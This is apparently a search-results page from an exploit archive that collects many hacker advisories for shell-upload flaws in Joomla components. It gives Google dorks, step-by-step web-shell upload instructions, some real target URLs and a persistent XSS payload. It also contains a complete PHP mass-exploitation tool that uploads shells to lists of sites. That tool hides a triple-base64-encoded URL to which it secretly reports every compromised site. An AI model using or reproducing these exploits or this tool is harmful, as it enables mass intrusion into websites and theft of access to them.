joomla upload
Search result for 'joomla upload'
(0.0302941799164 seconds)
wlhaan Hacker/Joomla Uploader Shell Upload ( na)
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> team wlhaan hacker |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
_____________________________________________________
Joomla Component com_uploader) Remote File Upload Vulnerability )
#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] dork:"index.php?option=com_uploader"
#####################################################
The exploit :
http://localhost/index.php?option=com_uploader
chaneg shell
shell.php..pjpeg
Get now shell :
http://localhost/path/upload//1263581195_shell.php.pjpeg
and good luck :D
Thanks to : shooq hacker ..
#####################################################
________________________________
حمل الأن Emoticons عربية جديدة للماسنجر! حمل الأن<http://arabic.arabia.msn.com/eidemoticons>
The Joomla Uploader component suffers from a shell upload vulnerability.
KedAns-Dz/Joomla File Uploader Shell Upload ( na)
### # Title : Joomla Component (com_fileuploader) Upload File Vulnerability # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : php # Impact : Upload File Vulnerability # Tested on : Windows XP sp3 FR ### # Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) ### # Go0gle Dork : inurl:com_fileuploader ### # Demo : http://[TARGET]/[PATH]/index.php?option=com_fileuploader&view=fileuploader&Itemid=7 # Example : http://www.aziz-rehman.com/index.php?option=com_fileuploader&view=fileuploader&Itemid=7 # Exploit : 1 - Goto Upload Page .../index.php?option=com_fileuploader&view=fileuploader&Itemid=7 2 - Upload Shell .txt .jpg ... etc #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One # XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ; # > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers < # My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others # 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ... # sec4ever.com members Dz : =>> # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #===========================================================================
The Joomla File Uploader component suffers from a shell upload vulnerability.
Sid3^effects/Minify4Joomla Upload and Persistent XSS Vulnerability ( php)
=======================================================
Minify4Joomla Upload and Persistent XSS Vulnerability
=======================================================
Name : Minify4Joomla Upload and Persistent XSS Vulnerability
Date : july 9,2010
Critical Level : HIGH
vendor URL :http://waltercedric.com/
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
Minify4Joomla combines, minifies, and caches JavaScript and CSS files on demand to speed up page loads. Minify (BSD license) is a PHP5 app that can combine multiple CSS or JavaScript files, compress their contents
######################################################################################################
Xploit :Upload Vulnerability
Step 1 : Register :D
Step 2 : Submit your article which has your evil script :P
Demo Url :http://website/index.php?option=com_content&view=article&layout=form&Itemid=51
Step 3 : Now check your article..
#######################################################################################################
Xploit: Persistent XSS Vulnerability
Attack pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
1.The attacker can insert xss scripts in the article section..
2.To submit your evil xss register and then go and submit your article
Demo url : http://website/index.php?option=com_content&view=article&layout=form&Itemid=51
3.Now check your article
#######################################################################################################
# 0day no more
# Sid3^effects
HcJ/Joomla Facileforms Shell Upload ( na)
#################################################################### [+] Exploit Title :Joomla facileforms component shell Upload Vulnerability [+] Author : HcJ [+] Date : 02-04-2011 [+] category: Web Apps [+] HomePage : Black-hat.cc #################################################################### Dork: "index.php?option=com_facileforms" Vulnerability: *shell Upload Vulnerability* [#] http://Black-hat.cc/index.php?option=com_facileforms&Itemid=xxxx xxxx= id [#] Upload your shell.php [#] Your shell here http://Black-hat.cc/components/com_facileforms/uploads/shell.php #################################################################### [#] Test yourself in "Trying security game" [#] http://try.black-hat.cc ####################################################################
The Joomla Facileforms component suffers from a shell upload vulnerability.
Cyb3r-1sT/Joomla Jsjobs Shell Upload ( na)
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> Script :: Joomla Jsjobs component
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit :: Joomla Jsjobs component shell Upload Vulnerability
1 >>> register on site and upload shell from :
2 >>> http://site/index.php?option=com_jsjobs&c=jsjobs&view=resume&layout=empview&vea=2
3 >>> upload shell.php.xdoc
4 >>> your shell here : http://site/components/com_jsjobs/resume/
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
<<->> All freinds , [ black-hat.cc ]
The Joomla Jsjobs component suffers from a shell upload vulnerability.
Sid3 effects/Joomla Joomlisting Shell Upload ( na)
===========================================
Joomla com_joomlisting Upload Vulnerability
===========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla com_joomlisting Upload Vulnerability
Date : june, 18 2010
Vendor url :http://www.joomclan.com/demo/joomlistings/index.php
Critical Level : MEDIUM
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
Start your very own Classified Ads website today or add classifieds functionality to your existing website using JoomListings. This component integrates with your Joomla portal and has all the tools you need to create a successful, and income-earning website. We provide you with an intuitive admin control panel from Joomla Administrator to add, modify settings and pricing packages on your site. The component can be set up to run itself through automatic email notifications, automated billing, and other valuable time-saving features.
JC - JoomListings is a professionally developed classifieds component that was built with you - the site owner - in mind and to assist you in generating income from your website. Whether you are running classifieds for autos, motorcycles, bicycles, real estate, jobs, or general merchandise, JoomListings component with Joomla! is the right package for you.
#######################################################################################################
com_joomdocs suffers from Upload Vulnerability
Xploit:Upload Vulnerability
Step 1 : As always register as a user :P
Step 2 : Select "post ad" option.
DEMO URL :http://www.joomclan.com/demo/joomlistings/index.php?option=com_joomlistings&view=ad&layout=post&Itemid=61
Step 3 : Upload your shell in upload image option as well as your description area
Step 4 : Now browse your and you can own the box ;)
###############################################################################################################
# 0day no more
# Sid3^effects
The Joomla Joomlisting component suffers from a shell upload vulnerability.
Setr0nix/Joomla JFUploader Shell Upload ( na)
=========================================================================================================
[#] Type : Joomla Component com_jfuploader Remote File Upload
[#] Author : Setr0nix
[#] Home : www.Setr0nix.com
[#] Contact : Admin@Setr0nix.com
=========================================================================================================
[#] Exploit :
1. Register
2. http://127.0.0.1/index.php?option=com_jfuploader&Itemid=[Itemid]
3. Download One gif Image ( Example : http://www.google.com/images/logo.gif )
4. Open logo.gif In Notepad++ And Got to Last Line
5. Copy And Past You PHP Code After The Last Line ( Don't Delete Any Thing Of Image Code )
6. Save It , Ctrl + S
7. Rename logo.gif To logo.php.gif And Upload It From com_jfuploader
8. To Run Your Uploaded File Go To This Link : http://127.0.0.1/files/YourUsername/logo.php.gif
=========================================================================================================
[#] S T T :
All Iranian Hackers , Offensive Security , Inj3ct0r , SecurityReason
=========================================================================================================
The Joomla JFUploader component suffers from a shell upload vulnerability.
Sid3 effects/Joomla Eportfolio Shell Upload ( na)
============================================= Joomla com_eportfolio Upload Vulnerability ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Joomla com_eportfolio Upload Vulnerability Date : june, 20 2010 Critical Level : HIGH Vendor Url : http://www.joomplace.com/e-portfolio/e-portfolio-description.html Google Dork:inurl:com_eportfolio Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,gunslinger_ greetz to :All ICW members and my friends :) luv y0 guyz ####################################################################################################### Description: Advanced access control will let a user decide who will be able to read and comment his joomla portfolio. There are many configuration features like the ability to upload files to portfolio, calendar and events by users and others. Who can use E-portfolio? * professionals wanting to have their own advanced blog with features such as forum and calendar * people looking for job to list their CV's * students and graduates having their portfolio ONLINE to be visible for teachers, parents, CEOs, etc. * anyone who wants the worls to know who they are, what they do and have already done! ############################################################################################################### Xploit:Upload Vulnerability STEP 1: Always register as a user :P STEP 2: Select any of the options Achievements • Plans • Events • Pages. DEMO URL :http://demo.joomplace.com/index.php?option=com_eportfolio&Itemid=1&task=viewlinks&user=71 STEP 3: Now the attackers can upload their shells in the above options :) DEMO URL : http://demo.joomplace.com/index.php?option=com_eportfolio&Itemid=18&task=personal&user=71 STEP 4: Now you can check your shell n root the server :P ############################################################################################################### # 0day no more # Sid3^effects
The Joomla Eportfolio component suffers from a remote shell upload vulnerability.
Sid3 effects/Joomla Annonces Shell Upload ( na)
#Title:Joomla Component com_annonces Upload Vulnerability
# Author: Sid3^effects
# Published: 2010-06-06
# email:shell_c99@yahoo.com
# vendor url : http://joomla.clubnautiquemarine.fr/
# google dork : inurl:com_annonces
############################################################################
ooooo .oooooo. oooooo oooooo oooo
`888' d8P' `Y8b `888. `888. .8'
888 888 `888. .8888. .8'
888 888 `888 .8'`888. .8'
888 888 `888.8' `888.8'
888 `88b ooo `888' `888'
o888o `Y8bood8P' `8' `8'
--------------------------------------------------------------------------------------
#####################Sid3^effects aKa HaRi##################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
#ShouTZ:kedar,dec0d3r,41.w4r10r
#spl shoutz:LiquidWorm,gunslinger_ :D
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
Description :
Simple Ads manager.
Registred user can place a classified ad with description, date , comments, photos and custom fields. Administrator manages the categories of classified ads, cutomizes fields in categories, validates the ads. The user receives an email after ad creation and after admin validation. User can modify its ad from the fronted.
Front-end shows a view with ad details (2 template views possible), vendor email contact, and photos.
This component has been developped for the yacht club of french navy whose members may sell their boat.
Contact me if you find something wrong on the component to the email address ajulou at yahoo.fr or if you have translated the component in another language
Module is able to view random or lasted ads
############################################################################
Xploit : Upload Vulnerability
STEP 1 : Register first :)
STEP 2 : Goto "Submit an ad"option.
STEP 3 : The attacker can upload a shell in the ITEM DESCRIPTION section and your shell gets executed :P
STEP 4 : Check your ad now in the particular category and find your shell :)
submit your ad :
DEMO URL :
http://joomla.clubnautiquemarine.fr/index.php?option=com_annonces&view=edit&Itemid=1
Once uploaded you can check your ad :P
############################################################################
#spl thks: exploit-db team
#Sid3^effects
The Joomla Annonces component suffers from a remote shell upload vulnerability.
kaMtiEz/Joomla Cartikads Shell Upload ( na)
###################################################################################
#
[~] Joomla components com_cartikads Remote File Upload vulnerability #
[~] Author : kaMtiEz (kamzcrew@yahoo.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : January 02, 2009 #
#
###################################################################################
[ Software Information ]
[+] Vendor : http://www.cartikahosting.com
[+] Download : -
[+] version : 1.0
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno
[+] Location : INDONESIA - JOGJA
[+] description : Cartikads is a Mambo Open Source ads management component.
##################################################################################
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
[ Vulnerable File ]
http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php
[ NOTE ]
upload with extension shell.php.jpg
your shell will be
http://server/[kaMtiEz]/images/stories/shell.php.jpg
http://server/[kaMtiEz]/images/banners/shell.php.jpg
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] tukulesto : where did u go ??
[+] Dengerin Radio yach di http://antisecradio.fm :D
[ QUOTE ]
[+] rm -rf
[ EOF ]
[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM
The Joomla Cartikads component suffers from a remote shell upload vulnerability.
miyachung/Janissaries Joomla Civicrm Shell Upload ( na)
<?php
/*
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file searchkeyword
* Example: php exploit.php sites.txt shell.php searchkeyword
*/
set_time_limit(0);
ob_start();
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;
public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
$this->file_regex = "/$regex/";
echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: miyachung@hotmail.com\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
$this->miyachung();
}
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
}
}
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file maxthread searchkeyword
* Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>
Janissaries Joomla Civicrm component exploitation tool that uploads a shell.
ViRuSMaN/Joomla Pinboard Remote File Upload ( na)
############################################################## | | Joomla Component [com_pinboard] Remote File Upload Vulnerability | | Author : ViRuSMaN | | Contact : v-.m@live.com | | Home : Islam-Attack.CoM , HackTeach.OrG | ############################################################## | | Dork inurl:com_pinboard | | Exploite : | | 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload | | or | | 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm | | [#] click on the photo in Top Of Left | | [#] upload your shell shell.php.jpg & Confirmer SVP | | [#] Pwd Your Shell | | target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg | | Or | | target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg | ############################################################## |Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's ##############################################################
The Joomla PinBoard component suffers from a remote file upload vulnerability.
Egyptian.H4x0rz/Joomla Free Consultation Shell Upload ( na)
#################################################################### [+] Exploit Title :Joomla com_free_consulation component shell Upload Vulnerability [+] Author : Egyptian.H4x0rz [+] Contact : SpY(at)Hotmail.Com [+] Date : 18-06-2011 [+] category: Web Apps #################################################################### Dork: "index.php?option=com_free_consulation" Vulnerability: *Shell Upload Vulnerability* [#] http://www.mytimeshareattorney.com/index.php?option=com_free_consulation [#] Upload your shell.php [#] Your shell will be here http://www.mytimeshareattorney.com/components/com_free_consulation/document/shell.php ####################################################################
The Joomla Free Consultation component suffers from a shell upload vulnerability.
J3yk0ob/Joomla Remository Remote Shell Upload ( na)
################################################################# # I N F O # # Exploit Title: Joomla com_remository Remote Upload File # Date: 2010-08-26 # Author: J3yk0ob # Home : http://www.J3yk0ob.com # ################################################################# # E X P L O I T # # 1. Register On Site # # 2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile # # 3. Add your php file , example : shell.php # # 4. http://www.Target.com/components/com_remository_files/ # # 5. If web server alowe to see directory you can see folder example : file_image_2 # # 6. You can find your shell in lates file_image_[latest Number] # # 7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php # # Dork : inurl:"index.php?com_remository" # ################################################################# # Contact Me # # Home : http://www.J3yk0ob.com # Email : 4dm1n@J3yk0ob.com # ##################################################################
The Joomla Remository component suffers from a remote shell upload vulnerability.
Agd_Scorp/Joomla Bch / Content Shell Upload ( na)
[ Joomla com_content Shell Upload Vulnerability]
[x] Author : Agd_Scorp
[x] Home : www.turkguvenligi.info (former)
[x] E-mail : vorscorp@hotmail.com
[x] Found : Mon, Dec 24, 2012
[x] Tested : Windows 7, Ubuntu, Gentoo
[x] Dork : inurl:"/index.php?option=com_bch"
________________________________________________________________
****************************************************************
[x] The Conlusion
The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in-order to gain information that is being provided by the administrator, although, if a few parameters are added as an extention-act, files can be uploaded, and therefore, more risk shall occur.
[x] Vuln Exploit Report:
http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into)
[x] Uploading a Shell
First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will be automatically be changed into *.php, therefore, your shell is spawned.
[x] Note:
h4ck y0u...
kill y0u...
0wn y0u....
- TURKGUVENLIGI -
Joomla content and bch components suffer from a remote shell upload vulnerability.